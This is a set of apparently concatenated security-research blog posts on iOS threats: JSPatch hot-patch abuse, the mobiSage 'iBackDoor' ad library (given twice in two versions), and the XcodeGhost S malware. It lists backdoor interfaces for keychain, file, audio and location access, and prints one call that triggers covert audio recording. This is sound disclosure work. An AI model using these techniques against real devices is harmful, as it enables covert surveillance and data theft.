Figure 4: Unnamed library function addresses

We use the importfind plug-in to find the function names associated with these addresses, as shown in Figure 5.

Figure 5: importfind plug-in run in Windbg

The importfind plug-in generates an IDA Python script file that is used to rename these global variables in our IDB as shown in Figure 2. Figure 6 shows a screenshot from IDA Pro after the script has renamed the global variables to more meaningful names.

Figure 6: IDA Pro with named global variables


This blog post shows the power of using the flare-dbg plug-ins with a debugger to gain insight into how the malware operates at runtime. We saw how to identify injected code using the injectfind plug-in and create memory breakpoints using membreak. We also demonstrated the usefulness of the importfind plug-in for identifying and renaming runtime imported functions.

To find out how to setup and get started with flare-dbg, head over the github project page where you’ll learn about setup and usage.

Hot or Not? The Benefits and Risks of iOS Remote Hot Patching


Apple has made a significant effort to build and maintain a healthy and clean app ecosystem. The essential contributing component to this status quo is the App Store, which is protected by a thorough vetting process that scrutinizes all submitted applications. While the process is intended to protect iOS users and ensure apps meet Apple’s standards for security and integrity, developers who have experienced the process would agree that it can be difficult and time consuming. The same process then must be followed when publishing a new release or issuing a patched version of an existing app, which can be extremely frustrating when a developer wants to patch a severe bug or security vulnerability impacting existing app users.

The developer community has been searching for alternatives, and with some success. A set of solutions now offer a more efficient iOS app deployment experience, giving app developers the ability to update their code as they see fit and deploy patches to users’ devices immediately. While these technologies provide a more autonomous development experience, they do not meet the same security standards that Apple has attempted to maintain. Worse, these methods might be the Achilles heel to the walled garden of Apple’s App Store.

In this series of articles, FireEye mobile security researchers examine the security risks of iOS apps that employ these alternate solutions for hot patching, and seek to prevent unintended security compromises in the iOS app ecosystem.

As the first installment of this series, we look into an open source solution: JSPatch.

Episode 1. JSPatch

JSPatch is an open source project – built on top of Apple’s JavaScriptCore framework – with the goal of providing an alternative to Apple’s arduous and unpredictable review process in situations where the timely delivery of hot fixes for severe bugs is vital. In the author’s own words (bold added for emphasis):

JSPatch bridges Objective-C and JavaScript using the Objective-C runtime. You can call any Objective-C class and method in JavaScript by just including a small engine. That makes the APP obtaining the power of script language: add modules or replacing Objective-C code to fix bugs dynamically.

JSPatch Machinery

The JSPatch author, using the alias Bang, provided a common example of how JSPatch can be used to update a faulty iOS app on his blog:

Figure 1 shows an Objc implementation of a UITableViewController with class name JPTableViewController that provides data population via the selector tableView:didSelectRowAtIndexPath:. At line 5, it retrieves data from the backend source represented by an array of strings with an index mapping to the selected row number. In many cases, this functions fine; however, when the row index exceeds the range of the data source array, which can easily happen, the program will throw an exception and subsequently cause the app to crash. Crashing an app is never an appealing experience for users.

Figure 1. Buggy Objc code without JSPatch

Within the realm of Apple-provided technologies, the way to remediate this situation is to rebuild the application with updated code to fix the bug and submit the newly built app to the App Store for approval. While the review process for updated apps often takes less time than the initial submission review, the process can still be time-consuming, unpredictable, and can potentially cause loss of business if app fixes are not delivered in a timely and controlled manner.

However, if the original app is embedded with the JSPatch engine, its behavior can be changed according to the JavaScript code loaded at runtime. This JavaScript file (hxxp:// in the above example) is remotely controlled by the app developer. It is delivered to the app through network communication.   

Figure 2 shows the standard way of setting up JSPatch in an iOS app. This code would allow download and execution of a JavaScript patch when the app starts:

Figure 2. Objc code enabling JSPatch in an app

JSPatch is indeed lightweight. In this case, the only additional work to enable it is to add seven lines of code to the application:didFiishLaunchingWithOptions: selector. Figure 3 shows the JavaScript downloaded from hxxp:// that is used to patch the faulty code.

Figure 3. JSPatch hot patch fixing index out of bound bug in Figure 1

Malicious Capability Showcase

JSPatch is a boon to iOS developers. In the right hands, it can be used to quickly and effectively deploy patches and code updates. But in a non-utopian world like ours, we need to assume that bad actors will leverage this technology for unintended purposes. Specifically, if an attacker is able to tamper with the content of JavaScript file that is eventually loaded by the app, a range of attacks can be successfully performed against an App Store application.

Target App

We randomly picked a legitimate app [1] with JSPatch enabled from the App Store. The logistics of setting up the JSPatch platform and resources for code patching are packaged in this routine [AppDelegate excuteJSPatch:], as shown in Figure 4 [2]:

Figure 4. JSPatch setup in the targeted app

There is a sequence of flow from the app entry point (in this case the AppDelegate class) to where the JavaScript file containing updates or patch code is written to the file system. This process involves communicating with the remote server to retrieve the patch code. On our test device, we eventually found that the JavaScript patch code is hashed and stored at the location shown in Figure 5. The corresponding content is shown in Figure 6 in Base64-encoded format:

Figure 5. Location of downloaded JavaScript on test device

Figure 6. Encrypted patch content

While the target app developer has taken steps to secure this sensitive data from prying eyes by employing Base64 encoding on top of a symmetric encryption, one can easily render this attempt futile by running a few commands through Cycript. The patch code, once decrypted, is shown in Figure 7:

Figure 7. Decrypted original patch content retrieved from remote server

This is the content that gets loaded and executed by JPEngine, the component provided by the JSPatch framework embedded in the target app. To change the behavior of the running app, one simply needs to modify the content of this JavaScript blob. Below we show several possibilities for performing malicious actions that are against Apple’s App Review Guidelines. Although the examples below are from a jailbroken device, we have demonstrated that they will work on non-jailbroken devices as well.

Example 1: Load arbitrary public frameworks into app process

a.     Example public framework: /System/Library/Frameworks/Accounts.framework
b.     Private APIs used by public framework: [ACAccountStore init], [ACAccountStore allAccountTypes]

The target app discussed above, when running, loads the frameworks shown in Figure 8 into its process memory:

Figure 8. iOS frameworks loaded by the target app

Note that the list above – generated from the Apple-approved iOS app binary – does not contain Accounts.framework. Therefore, any “dangerous” or “risky” operations that rely on the APIs provided by this framework are not expected to take place. However, the JavaScript code shown in Figure 9 invalidates that assumption.

Figure 9. JavaScript patch code that loads the Accounts.framework into the app process

If this JavaScript code were delivered to the target app as a hot patch, it could dynamically load a public framework, Accounts.framework, into the running process. Once the framework is loaded, the script has full access to all of the framework’s APIs. Figure 10 shows the outcome of executing the private API [ACAccountStore allAccountTypes], which outputs 36 account types on the test device. This added behavior does not require the app to be rebuilt, nor does it require another review through the App Store.  

Figure 10. The screenshot of the console log for utilizing Accounts.framework

The above demonstration highlights a serious security risk for iOS app users and app developers. The JSPatch technology potentially allows an individual to effectively circumvent the protection imposed by the App Store review process and perform arbitrary and powerful actions on the device without consent from the users. The dynamic nature of the code makes it extremely difficult to catch a malicious actor in action. We are not providing any meaningful exploit in this blog post, but instead only pointing out the possibilities to avoid low-skilled attackers taking advantage of off-the-shelf exploits.

Example 2: Load arbitrary private frameworks into app process

a.     Example private framework: /System/Library/PrivateFrameworks/BluetoothManager.framework
Private APIs used by example framework: [BluetoothManager connectedDevices], [BluetoothDevice name]

Similar to the previous example, a malicious JSPatch JavaScript could instruct an app to load an arbitrary private framework, such as the BluetoothManager.framework, and further invoke private APIs to change the state of the device. iOS private frameworks are intended to be used solely by Apple-provided apps. While there is no official public documentation regarding the usage of private frameworks, it is common knowledge that many of them provide private access to low-level system functionalities that may allow an app to circumvent security controls put in place by the OS. The App Store has a strict policy prohibiting third party apps from using any private frameworks. However, it is worth pointing out that the operating system does not differentiate Apple apps’ private framework usage and a third party app’s private framework usage. It is simply the App Store policy that bans third party use.

With JSPatch, this restriction has no effect because the JavaScript file is not subject to the App Store’s vetting. Figure 11 shows the code for loading the BluetoothManager.framework and utilizing APIs to read and change the states of Bluetooth of the host device. Figure 12 shows the corresponding console outputs.

Figure 11. JavaScript patch code that loads the BluetoothManager.framework into the app process


Figure 12. The screenshot of the console log for utilizing BluetoothManager.framework

Example 3: Change system properties via private API

a.     Example dependent framework: b/System/Library/Frameworks/CoreTelephony.framework
b.    Private API used by example framework: [CTTelephonyNetworkInfo updateRadioAccessTechnology:]

Consider a target app that is built with the public framework CoreTelephony.framework. Apple documentation explains that this framework allows one to obtain information about a user’s home cellular service provider. It exposes several public APIs to developers to achieve this, but [CTTelephonyNetworkInfo updateRadioAccessTechnology:] is not one of them. However, as shown in Figure 13 and Figure 14, we can successfully use this private API to update the device cellular service status by changing the radio technology from CTRadioAccessTechnologyHSDPA to CTRadioAccessTechnologyLTE without Apple’s consent.

Figure 13. JavaScript code that changes the Radio Access Technology of the test device


Figure 14. Corresponding execution output of the above JavaScript code via Private API

Example 4: Access to Photo Album (sensitive data) via public APIs

a.     Example loaded framework: /System/Library/Frameworks/Photos.framework
b.     Public APIs: [PHAsset fetchAssetsWithMediaType:options:]

Privacy violations are a major concern for mobile users. Any actions performed on a device that involve accessing and using sensitive user data (including contacts, text messages, photos, videos, notes, call logs, and so on) should be justified within the context of the service provided by the app. However, Figure 15 and Figure 16 show how we can access the user’s photo album by leveraging the private APIs from built-in Photo.framework to harvest the metadata of photos. With a bit more code, one can export this image data to a remote location without the user’s knowledge.

Figure 15. JavaScript code that access the Photo Library


Figure 16. Corresponding output of the above JavaScript in Figure 15

Example 5: Access to Pasteboard in real time

a.     Example Framework: /System/Library/Frameworks/UIKit.framework
.     APIs: [UIPasteboard strings], [UIPasteboard items], [UIPasteboard string]

iOS pasteboard is one of the mechanisms that allows a user to transfer data between apps. Some security researchers have raised concerns regarding its security, since pasteboard can be used to transfer sensitive data such as accounts and credentials. Figure 17 shows a simple demo function in JavaScript that, when running on the JSPatch framework, scrapes all the string contents off the pasteboard and displays them on the console. Figure 18 shows the output when this function is injected into the target application on a device.

Figure 17. JavaScript code that scraps the pasteboard which might contain sensitive information


Figure 18. Console output of the scraped content from pasteboard by code in Figure 17

We have shown five examples utilizing JSPatch as an attack vector, and the potential for more is only constrained by an attacker’s imagination and creativity.

Future Attacks

Much of iOS’ native capability is dependent on C functions (for example, dlopen(), UIGetImageScreen()). Due to the fact that C functions cannot be reflectively invoked, JSPatch does not support direct Objective C to JavaScript mapping. In order to use C functions in JavaScript, an app must implement JSExtension, which packs the C function into corresponding interfaces that are further exported to JavaScript.

This dependency on additional Objective C code to expose C functions casts limitations on the ability of a malicious actor to perform operations such as taking stealth screenshots, sending and intercepting text messages without consent, stealing photos from the gallery, or stealthily recording audio. But these limitations can be easily lifted should an app developer choose to add a bit more Objective C code to wrap and expose these C functions. In fact, the JSPatch author could offer such support to app developers in the near future through more usable and convenient interfaces, granted there is enough demand. In this case, all of the above operations could become reality without Apple’s consent.

Security Impact

It is a general belief that iOS devices are more secure than mobile devices running other operating systems; however, one has to bear in mind that the elements contributing to this status quo are multi-faceted. The core of Apple’s security controls to provide and maintain a secure ecosystem for iOS users and developers is their walled garden – the App Store. Apps distributed through the App Store are significantly more difficult to leverage in meaningful attacks. To this day, two main attack vectors make up all previously disclosed attacks against the iOS platform:

1.     Jailbroken iOS devices that allow unsigned or ill-signed apps to be installed due to the disabled signature checking function. In some cases, the sandbox restrictions are lifted, which allows apps to function outside of the sandbox.

2.     App sideloading via Enterprise Certifications on non-jailbroken devices. FireEye published a series of reports that detailed attacks exploiting this attack surface, and recent reports show a continued focus on this known attack vector.

However, as we have highlighted in this report, JSPatch offers an attack vector that does not require sideloading or a jailbroken device for an attack to succeed. It is not difficult to identify that the JavaScript content, which is not subject to any review process, is a potential Achilles heel in this app development architecture. Since there are few to zero security measures to ensure the security properties of this file, the following scenarios for attacking the app and the user are conceivable:

●      Precondition: 1) App embeds JSPatch platform; 2) App Developer has malicious intentions.

○      Consequences: The app developer can utilize all the Private APIs provided by the loaded frameworks to perform actions that are not advertised to Apple or the users. Since the developer has control of the JavaScript code, the malicious behavior can be temporary, dynamic, stealthy, and evasive. Such an attack, when in place, will pose a big risk to all stakeholders involved.

○      Figure 19 demonstrates a scenario of this type of attack:

Figure 19. Threat model for JSPatch used by a malicious app developer

●      Precondition: 1) Third-party ad SDK embeds JSPatch platform; 2) Host app uses the ad SDK; 3) Ad SDK provider has malicious intention against the host app.

○      Consequences: 1) Ad SDK can exfiltrate data from the app sandbox; 2) Ad SDK can change the behavior of the host app; 3) Ad SDK can perform actions on behalf of the host app against the OS.

○      This attack scenario is shown in Figure 20:

Figure 20. Threat model for JSPatch used by a third-party library provider

The FireEye discovery of iBackdoor in 2015 is an alarming example of displaced trust within the iOS development community, and serves as a sneak peek into this type of overlooked threat.

●      Precondition: 1) App embeds JSPatch platform; 2) App Developer is legitimate; 3) App does not protect the communication from the client to the server for JavaScript content; 4) A malicious actor performs a man-in-the-middle (MITM) attack that tampers with the JavaScript content.

○      Consequences: MITM can exfiltrate app contents within the sandbox; MITM can perform actions through Private API by leveraging host app as a proxy.

○      This attack scenario is shown in Figure 21:

           Figure 21. Threat model for JSPatch used by an app targeted by MITM

Field Survey

JSPatch originated from China. Since its release in 2015, it has garnered success within the Chinese region. According to JSPatch, many popular and high profile Chinese apps have adopted this technology. FireEye app scanning found a total 1,220 apps in the App Store that utilize JSPatch.

We also found that developers outside of China have adopted this framework. On one hand, this indicates that JSPatch is a useful and desirable technology in the iOS development world. On the other hand, it signals that users are at greater risk of being attacked – particularly if precautions are not taken to ensure the security of all parties involved. Despite the risks posed by JSPatch, FireEye has not identified any of the aforementioned applications as being malicious.  

Food For Thought

Many applaud Apple’s App Store for helping to keep iOS malware at bay. While it is undeniably true that the App Store plays a critical role in winning this acclaim, it is at the cost of app developers’ time and resources.

One of the manifestations of such a cost is the app hot patching process, where a simple bug fix has to go through an app review process that subjects the developers to an average waiting time of seven days before updated code is approved. Thus, it is not surprising to see developers seeking various solutions that attempt to bypass this wait period, but which lead to unintended security risks that may catch Apple off guard.

JSPatch is one of several different offerings that provide a low-cost and streamlined patching process for iOS developers. All of these offerings expose a similar attack vector that allows patching scripts to alter the app behavior at runtime, without the constraints imposed by the App Store’s vetting process. Our demonstration of abusing JSPatch capabilities for malicious gain, as well as our presentation of different attack scenarios, highlights an urgent problem and an imperative need for a better solution – notably due to a growing number of app developers in China and beyond having adopted JSPatch.

Many developers have doubts that the App Store would accept technologies leveraging scripts such as JavaScript. According to Apple’s App Store Review Guidelines, apps that download code in any way or form will be rejected. However, the JSPatch community argues it is in compliance with Apple’s iOS Developer Program Information, which makes an exception to scripts and code downloaded and run by Apple's built-in WebKit framework or JavascriptCore, provided that such scripts and code do not change the primary purpose of the application by providing features or functionality that are inconsistent with the intended and advertised purpose of the application as submitted to the App Store.

The use of malicious JavaScript (which presumably changes the primary purpose of the application) is clearly prohibited by the App Store policy. JSPatch is walking a fine line, but it is not alone. In our coming reports, we intend to similarly examine more solutions in order to find a better solution that satisfies Apple and the developer community without jeopardizing the users security experience. Stay tuned!


[1] We have contacted the app provider regarding the issue. In order to protect the app vendor and its users, we choose to not disclose the identity before they have this issue addressed.
[2] The redacted part is the hardcoded decryption key.


iBackDoor: High-Risk Code Hits iOS Apps


FireEye mobile researchers recently discovered potentially “backdoored” versions of an ad library embedded in thousands of iOS apps originally published in the Apple App Store. The affected versions of this library embedded functionality in iOS apps that used the library to display ads, allowing for potential malicious access to sensitive user data and device functionality. NOTE: Apple has worked with us on the issue and has since removed the affected apps.

These potential backdoors could have been controlled remotely by loading JavaScript code from a remote server to perform the following actions on an iOS device:

  • Capture audio and screenshots
  • Monitor and upload device location
  • Read/delete/create/modify files in the app’s data container
  • Read/write/reset the app’s keychain (e.g., app password storage)
  • Post encrypted data to remote servers
  • Open URL schemes to identify and launch other apps installed on the device
  • “Side-load” non-App Store apps by prompting the user to click an “Install” button

The offending ad library contained identifying data suggesting that it is a version of the mobiSage SDK [1]. We found 17 distinct versions of the potentially backdoored ad library: version codes 5.3.3 to 6.4.4. However, in the latest mobiSage SDK publicly released by adSage [2] – version 7.0.5 – the potential backdoors are not present. It is unclear whether the potentially backdoored versions of the ad library were released by adSage or if they were created and/or compromised by a malicious third party.

As of November 4, we have identified 2,846 iOS apps containing the potentially backdoored versions of mobiSage SDK. Among these, we observed more than 900 attempts to contact an ad adSage server capable of delivering JavaScript code to control the backdoors. We notified Apple of the complete list of affected apps and technical details on October 21, 2015.

While we have not observed the ad server deliver any malicious commands intended to trigger the most sensitive capabilities such as recording audio or stealing sensitive data, affected apps periodically contact the server to check for new JavaScript code. In the wrong hands, malicious JavaScript code that triggers the potential backdoors could be posted to eventually be downloaded and executed by affected apps.

Technical Details

As shown in Figure 1, the affected mobiSage library included two key components, separately implemented in Objective-C and JavaScript. The Objective-C component, which we refer to as msageCore, implements the underlying functionality of the potential backdoors and exposed interfaces to the JavaScript context through a WebView. The JavaScript component, which we refer to as msageJS, provides high-level execution logic and can trigger the potential backdoors by invoking the interfaces exposed by msageCore. Each component has its own separate version number.

Figure 1: Key components of backdoored mobiSage SDK

In the remainder of this section, we reveal internal details of msageCore, including its communication channel and high-risk interfaces. Then we describe how msageJS is launched and updated, and how it can trigger the backdoors.

Backdoors in msageCore

Communication channel

MsageCore implements a general framework to communicate with msageJS via the ad library’s WebView. Commands and parameters are passed via specially crafted URLs in the format adsagejs://cmd&parameter. As shown in the reconstructed code fragment in Figure 2, msageCore fetches the command and parameters from the JavaScript context and inserts them in its command queue.

Figure 2: Communication via URL loading in WebView

To process a command in its queue, msageCore dispatches the command, along with its parameters, to a corresponding Objective-C class and method. Figure 3 shows portions of the reconstructed command dispatching code.

Figure 3: Command dispatch in msageCore

At-risk interfaces

Each dispatched command ultimately arrives at an Objective-C class in msageCore. Table 1 shows a subset of msageCore classes and the corresponding interfaces that they expose.

msageCore Class Name



- captureAudio:

- captureImage:

- openMail:

- openSMS:

- openApp:

- openInAppStore:

- openCamera:

- openImagePicker:

- ...


- start:

- stop:

- setTimer:

- returnLocationInfo:webViewId:

- ...



- createDir

- deleteDir:

- deleteFile:

- createFile:

- getFileContent:

- ...


- writeKeyValue:

- readValueByKey:

- resetValueByKey:


- sendHttpGet:

- sendHttpPost:

- sendHttpUpload:

- ...


- MD5Encrypt:

- SHA1Encrypt:

- AESEncrypt:

- AESDecrypt:

- DESEncrypt:

- DESDecrypt:

- XOREncrypt:

- XORDecrypt:

- RC4Encrypt:

- RC4Decrypt

- ...

Table 1: Selected interfaces exposed by msageCore

The selected interfaces reveal some of the key capabilities exposed by the potential backdoors in the library. They expose the potential ability to capture audio and screenshots while the affected app is in use, identify and launch other apps installed on the device, periodically monitor location, read and write files in the app’s data container, and read/write/reset “secure” keychain items stored by the app. Additionally, any data collected via these interfaces can be encrypted with various encryption schemes and uploaded to a remote server.

Beyond the selected interfaces, the ad library potentially exposed users to additional risks by including logic to promote and install “enpublic” apps as shown in Figure 4. As we have highlighted in previous blogs [footnotes 3, 4, 5, 6, 7], enpublic apps can introduce additional security risks by using private APIs in certain versions of iOS. These private APIs potentially allow for background monitoring of SMS or phone calls, breaking the app sandbox, stealing email messages, and demolishing arbitrary app installations. Apple has addressed a number of issues related to enpublic apps that we have brought to their attention.

Figure 4: Installing “enpublic” apps to bypass Apple App Store review

We can see how this ad library functions by examining the implementations of some of the selected interfaces. Figure 5 shows reconstructed code snippets for capturing audio. Before storing recorded audio to a file audio_xxx.wav, the code retrieves two parameters from the command for recording duration and threshold.

Figure 5: Capturing audio with duration and threshold

Figure 6 shows a code snippet for initializing the app’s keychain before reading. The accessed keychain is in the kSecClassGenericPassword class, which is widely used by apps for storing secret credentials such as passwords.

Figure 6: Reading the keychain in the kSecClassGenericPassword class

Remote control in msageJS

msageJS contains JavaScript code for communicating with a remote server and submitting commands to msageCore. The file layout of msageJS is shown in Figure 7. Inside sdkjs.js, we find a wrapper object called adsage and the JavaScript interface for command execution.

Figure 7: The file layout of msageJS

The command execution interface is constructed as follows:

          adsage.exec(className, methodName, argsList, onSuccess, onFailure);

The className and methodName parameters correspond to classes and methods in msageCore. The argsList parameter can be either a list or dict, and the exact types and values can be determined by reversing the methods in msageCore. The final two parameters are function callbacks invoked when the method exits. For example, the following invocation starts audio capture:

adsage.exec("MSageCoreUIManager", "captureAudio", ["Hey", 10, 40],  onSuccess, onFailure);

Note that the files comprising msageJS cannot be found by simply listing the files in an affected app’s IPA. The files themselves are zipped and encoded in Base64 in the data section of the ad library binary. After an affected app is launched, msageCore first decodes the string and extracts msageJS to the app’s data container, setting index.html shown in Figure 7 as the landing page in the ad library WebView to launch msageJS.

Figure 8: Base64 encoded JavaScript component in Zip format

When msageJS is launched, it sends a POST request to hxxp:// to check for updates. The server responds with information about the latest msageJS version, including a download URL, as shown in Figure 9.

Figure 9: Server response to msageJS update request via HTTP POST

Enterprise Protection

To ensure the protection of our customers, FireEye has deployed detection rules in its Network Security (NX) and Mobile Threat Prevention (MTP) products to identify the affected apps and their network activities.

For FireEye NX customers, alerts will be generated if an employee uses an infected app while their iOS device is connected to the corporate network. FireEye MTP management customers have full visibility into high-risk apps installed on mobile devices in their deployment base. End users will receive on-device notifications of the risky app and IT administrators receive email alerts.


In this blog, we described an ad library that affected thousands of iOS apps with potential backdoor functionality. We revealed the internals of backdoors which could be used to trigger audio recording, capture screenshots, prompt the user to side-load other high-risk apps, and read sensitive data from the app’s keychain, among other dubious capabilities. We also showed how these potential backdoors in ad libraries could be controlled remotely by JavaScript code should their ad servers fall under malicious actors’ control.


XcodeGhost S: A New Breed Hits the US

Just over a month ago, iOS users were warned of the threat to their devices by the XcodeGhost malware. Apple quickly reacted, taking down infected apps from the App Store and releasing new security features to stop malicious activities. Through continuous monitoring of our customers’ networks, FireEye researchers have found that, despite the quick response, the threat of XcodeGhost has maintained persistence and been modified.

More specifically, we found that:

  • XcodeGhost has entered into U.S. enterprises and is a persistent security risk
  • Its botnet is still partially active
  • A variant we call XcodeGhost S reveals more advanced samples went undetected

After monitoring XcodeGhost related activity for four weeks, we observed 210 enterprises with XcodeGhost-infected applications running inside their networks, generating more than 28,000 attempts to connect to the XcodeGhost Command and Control (CnC) servers -- which, while not under attacker control, are vulnerable to hijacking by threat actors. Figure 1 shows the top five countries XcodeGhost attempted to callback to during this time.

Figure 1. Top five countries XcodeGhost attempted to callback in a four-week span

The 210 enterprises we detected with XcodeGhost infections represent a wide range of industries. Figure 2 shows the top five industries affected by XcodeGhost, sorted by the percentage of callback attempts to the XcodeGhost CnC servers from inside their networks:

Figure 2: Top five industries affected based on callback attempts

Researchers have demonstrated how XcodeGhost CnC traffic can be hijacked to:

  • Distribute apps outside the App Store
  • Force browse to URL
  • Aggressively promote any app in the App Store by launching the download page directly
  • Pop-up phishing windows

Figure 3 shows the top 20 most active infected apps among 152 apps, based on data from our DTI cloud:

Figure 3: Top 20 infected apps

Although most vendors have already updated their apps on App Store, this chart indicates many users are actively using older, infected versions of various apps in the field. The version distribution varies among apps. For example, the most popular Apps 网易云音乐 and WeChat-infected versions are listed in Figure 4.

App Name


Incident Count (in 3 weeks)




Music 163







Figure 4: Sample infected app versions

The infected iPhones are running iOS versions from 6.x.x to 9.x.x as illustrated by Figure 5. It is interesting to note that nearly 70% of the victims within our customer base remain on older iOS versions. We encourage them to update to the latest version iOS 9 as quickly as possible.

Figure 5: Distribution of iOS versions running infected apps

Some enterprises have taken steps to block the XcodeGhost DNS query within their network to cut off the communication between employees’ iPhones and the attackers’ CnC servers to protect them from being hijacked. However, until these employees update their devices and apps, they are still vulnerable to potential hijacking of the XcodeGhost CnC traffic -- particularly when outside their corporate networks.

Given the number of infected devices detected within a short period among so many U.S enterprises, we believe that XcodeGhost continues to be an ongoing threat for enterprises.

XcodeGhost Modified to Exploit iOS 9

We have worked with Apple to have all XcodeGhost and XcodeGhost S (described below) samples we have detected removed from the App Store.

XcodeGhost is planted in different versions of Xcode, including Xcode 7 (released for iOS 9 development). In the latest version, which we call XcodeGhost S, features have been added to infect iOS 9 and bypass static detection.

According to [1], Apple introduced the “NSAppTransportSecurity” approach for iOS 9 to improve client-server connection security. By default, only secure connections (https with specific ciphers) are allowed on iOS 9. Due to this limitation, previous versions of XcodeGhost would fail to connect with the CnC server by using http. However, Apple also allows developers to add exceptions (“NSAllowsArbitraryLoads”) in the app’s Info.plist to allow http connection. As shown in Figure 6, the XcodeGhost S sample reads the setting of “NSAllowsArbitraryLoads” under the “NSAppTransportSecurity” entry in the app’s Info.plist and picks different CnC servers (http/https) based on this setting.

Figure 6: iOS 9 adoption in XcodeGhost S

Further, the CnC domain strings are concatenated character by character to bypass the static detection in XcodeGhost S, such behavior is shown in Figure 7.

Figure 7: Construct the CnC domain character by character

The FireEye iOS dynamic analysis platform has successfully detected an app  (“自由邦”)  [2] infected by XcodeGhost S and this app has been taken down from App Store in cooperation with Apple. It is a shopping app for travellers and is available on both U.S. and CN App Stores. As shown in Figure 8, the infected app’s version is 2.6.6, updated on Sep. 15.

Figure 8: An App Store app is infected with XcodeGhost S

Enterprise Protection

FireEye MTP has detected and assisted in Apple’s takedown of thousands of XcodeGhost-infected iOS applications. We advise all organizations to notify their employees of the threat of XcodeGhost and other malicious iOS apps. Employees should make sure that they update all apps to the latest version. For the apps Apple has removed, users should remove the apps and switch to other uninfected apps on App Store.

FireEye MTP management customers have full visibility into which mobile devices are infected in their deployment base. We recommend that customers immediately review MTP alerts, locate infected devices/users, and quarantine the devices until the infected apps are removed. FireEye NX customers are advised to immediately review alert logs for activities related to XcodeGhost communications.


iBackDoor: High-risk Code Sneaks into the App Store

The library embeds backdoors in unsuspecting apps that make use of it to display ads, exposing sensitive data and functionality. The backdoors can be controlled remotely by loading JavaScript code from remote servers to perform the following actions:

  • Capture audio and screenshots.
  • Monitor and upload device location.
  • Read/delete/create/modify files in the app’s data container.
  • Read/Write/Reset the app’s keychain (e.g., app password storage).
  • Post encrypted data to remote servers.
  • Open URL schemes to identify and launch other apps installed on the device.
  • “Side-load” non-App Store apps by prompting the user to click an “Install” button.

The offending ad library contains identifying data suggesting that it is a version of the mobiSage SDK [1]. We found 17 distinct versions of the backdoored ad library, with version codes between 5.3.3 and 6.4.4. However, in the latest mobiSage SDK publicly released by adSage [2], identified as version 7.0.5, the backdoors are not present. We cannot determine with certainty whether the backdoored versions of the library were actually released by adSage, or whether they were created and/or compromised by a third party.

As of publication of this blog, we have identified 2846 apps published in the App Store containing backdoored versions of mobiSage SDK. Among these 2846 apps, we have observed over 900 attempt to contact their command and control (C2) server. We have notified Apple and provided the details to them.

These backdoors can be controlled not only by the original creators of the ad library, but potentially also by outside threat actors. While we have not observed commands from the C2 server intended to trigger the most sensitive capabilities such recording audio or stealing sensitive data, there are several ways that the backdoors could be abused by third-party targeted attackers to further compromise the security and privacy of the device and user:

  • An attacker could reverse-engineer the insecure HTTP-based control protocol between the ad library and its server, and then hijack the connection to insert commands to trigger the backdoors and steal sensitive information.
  • A malicious app developer can similarly inject commands, utilizing the library’s backdoors to build their own surveillance app. Since the ad library has passed the App Store review process in numerous apps, this is an attractive way to create an app with these hidden behaviors that will pass under Apple’s radar.

App Store Protections Ineffective

Despite Apple’s reputation for keeping malware out of the App Store with its strict review process, this case demonstrates that it is still possible for dangerous code that exposes users to critical security and privacy risks to sneak into the App Store by piggybacking on unsuspecting apps. Backdoors that enable silently recording audio and uploading sensitive data when triggered by downloaded code clearly violate the requirements of the iOS Developer Program [3]. The requirements state that apps are not permitted to download code or scripts, with the exception of scripts that “do not change the primary purpose of the Application by providing features or functionality that are inconsistent with the intended and advertised purpose of the Application as submitted to the App Store.” And, for apps that can record audio, “a reasonably conspicuous audio, visual or other indicator must be displayed to the user as part of the Application to indicate that a Recording is taking place.”  The backdoored versions of mobiSage clearly violate these requirements, yet thousands of affected apps made it past the App Store review process.

Technical Details

As shown in Figure 1, the backdoored mobiSage library includes two key components, separately implemented in Objective-C and JavaScript. The Objective-C component, which we refer to as msageCore, implements the underlying functionality of the backdoors and exposes interfaces to the JavaScript context through a WebView. The JavaScript component, which we refer to as msageJS, provides high-level execution logic and can trigger the backdoors by invoking the interfaces exposed by msageCore. Each component has its own separate version number.


Figure 1: Key components of backdoored mobiSage SDK

In the remainder of this section, we reveal internal details of msageCore, including its communication channel and high-risk interfaces. Then, we describe how msageJS is launched and updated, and how it can trigger the backdoors.

Backdoors in msageCore

Communication channel

MsageCore implements a general framework to communicate with msageJS via the ad library’s WebView. Commands and parameters are passed via specially crafted URLs in the format  adsagejs://cmd&parameter. As shown in the reconstructed code fragment in Figure 2, msageCore fetches the command and parameters from the JavaScript context and inserts them in its command queue.



Figure 2: Communication via URL loading in WebView.

To process a command in its queue, msageCore dispatches the command along with its parameters to a corresponding Objective-C class and method. Figure 3 shows portions of the reconstructed command dispatching code.



Figure 3: Command dispatch in msageCore.

High-risk interfaces

Each dispatched command ultimately arrives at an Objective-C class in msageCore. Table 1 shows a subset of msageCore classes and the corresponding interfaces that they expose.

msageCore Class Name



- captureAudio:

- captureImage:

- openMail:

- openSMS:

- openApp:

- openInAppStore:

- openCamera:

- openImagePicker:

- ...


- start:

- stop:

- setTimer:

- returnLocationInfo:webViewId:

- ...



- createDir

- deleteDir:

- deleteFile:

- createFile:

- getFileContent:

- ...


- writeKeyValue:

- readValueByKey:

- resetValueByKey:


- sendHttpGet:

- sendHttpPost:

- sendHttpUpload:

- ...


- MD5Encrypt:

- SHA1Encrypt:

- AESEncrypt:

- AESDecrypt:

- DESEncrypt:

- DESDecrypt:

- XOREncrypt:

- XORDecrypt:

- RC4Encrypt:

- RC4Decrypt

- ...

Table 1: Selected interfaces exposed by msageCore

The selected interfaces reveal some of the key capabilities exposed by the backdoors in the library. They expose the ability to capture audio and screenshots while the affected app is in use, identify and launch other apps installed on the device, periodically monitor location, read and write files in the app’s data container, and read/write/reset “secure” keychain items stored by the app. Additionally, any data collected via these interfaces can be encrypted with various encryption schemes and uploaded to a remote server.


Beyond the selected interfaces, the ad library exposes users to additional risks by including explicit logic to promote and install “enpublic” apps shown in Figure 4. As we have highlighted in previous blogs [4, 5, 6, 7, 8], enpublic apps can introduce additional security risks by using private APIs, which would normally cause an app to be blocked by the App Store review process. In previous blogs we have described a number of “Masque” attacks utilizing enpublic apps [5, 6, 7], which affect pre-iOS 9 devices. The attacks include background monitoring of SMS or phone calls, breaking the app sandbox, stealing email messages, and demolishing arbitrary app installations.



Figure 4: Installing “enpublic” apps to bypass Apple App Store review


We can observe the functionality of the ad library by examining the implementations of some of the selected interfaces. Figure 5 shows reconstructed code snippets for capturing audio. Before storing recorded audio to a file audio_xxx.wav, the code retrieves two parameters from the command for recording duration and threshold.



Figure 5: Capturing audio with duration and threshold.


